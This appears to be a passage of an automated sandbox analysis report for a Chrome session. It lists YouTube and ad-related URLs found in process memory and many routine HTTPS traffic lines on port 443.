00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2342874633.000028EC06378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2340949325.000028EC067D6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485699742.000028EC0384C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505400410.000028EC07AEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX
                                  Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341031480.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494918575.000028EC046E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400603614.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329921091.000028EC06930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX(
                                  Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXM$
                                  Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXdator
                                  Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501198410.000028EC068C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXler
                                  Source: chrome.exe, 00000000.00000003.2356104978.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2371291317.000028EC0800B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2364902944.000028EC07FB3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361454430.000028EC07F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si
                                  Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=
                                  Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=-htCYBtW0ws255C
                                  Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329678735.000028EC06310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2356027264.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393532398.000028EC063EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394042539.000028EC03558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342010290.000028EC04DF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474534440.000028EC02B84000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws
                                  Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329951400.000028EC0663C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2491958834.000028EC040B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329921091.000028EC06930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws(
                                  Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsdator
                                  Source: chrome.exe, 00000000.00000002.2499056442.000028EC0621C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjSQ?
                                  Source: chrome.exe, 00000000.00000002.2508320989.000028EC07F03000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497331456.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496982560.000028EC04B21000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496056454.000028EC048D5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482855525.000028EC03537000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2493480651.000028EC04191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si
                                  Source: chrome.exe, 00000000.00000003.2314698479.000028EC03F04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487214642.000028EC03B30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=
                                  Source: chrome.exe, 00000000.00000003.2352192649.000028EC04A69000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484973258.000028EC03774000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385463463.000028EC0803B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2323165506.000028EC04C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2508320989.000028EC07F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2302249757.000028EC04D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496886639.000028EC04A69000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377894851.000028EC03914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR
                                  Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320456301.000028EC04810000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR(
                                  Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRator
                                  Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRc);
                                  Source: chrome.exe, 00000000.00000003.2314698479.000028EC03F04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=rXkudamggTRB6DF
                                  Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?siYrX
                                  Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491838575.000028EC04094000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6Uh0?
                                  Source: chrome.exe, 00000000.00000002.2488324966.000028EC03C88000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/generate_204?cDRRTQ
                                  Source: chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/generate_204?oFXXFw
                                  Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/generate_204?xfMLzA
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/iframe_api
                                  Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330516367.000028EC067EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/desktop/fc303b88/jsbin/lottie-light.vflset/lottie-light.js
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                                  Source: chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505015083.000028EC07974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js
                                  Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315986851.000028EC0102A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js
                                  Source: chrome.exe, 00000000.00000003.2332503048.000028EC04B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.jsaDb
                                  Source: chrome.exe, 00000000.00000003.2330677012.000028EC001CA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js
                                  Source: chrome.exe, 00000000.00000002.2501993718.000028EC06D4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js
                                  Source: chrome.exe, 00000000.00000002.2485391480.000028EC037F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=FURi5aHgp1g
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394042539.000028EC03558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=gobWGqPjLSQ
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394042539.000028EC03558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=gobWGqPjLSQ&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%
                                  Source: chrome.exe, 00000000.00000003.2370628411.000028EC03914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385463463.000028EC0803B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2370451846.000028EC04B44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474534440.000028EC02B84000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2377894851.000028EC03914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370551942.000028EC038DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484699862.000028EC03718000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385463463.000028EC08033000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370498638.000028EC033A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2506106388.000028EC07C5C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856897726.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370551942.000028EC038DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/youtubei/v1/log_event?alt=json
                                  Source: chrome.exe, 00000000.00000003.2369861259.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC0458C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.comcross-origin-resource-policy:cross-originaccess-control-allow-credentials:tru
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://yieldlab.net
                                  Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470116117.000028EC02558000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489810514.000028EC03EC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2502048114.000028EC06D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480846916.000028EC03334000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486301784.000028EC03948000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/
                                  Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/l/
                                  Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330516367.000028EC067EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yt3.ggpht.com/ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA
                                  Source: chrome.exe, 00000000.00000002.2487485402.000028EC03B85000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2471255420.000028EC02708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378517392.000028EC047E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2353212423.000028EC07C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489230157.000028EC03E5A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yt3.ggpht.com/ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49677
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
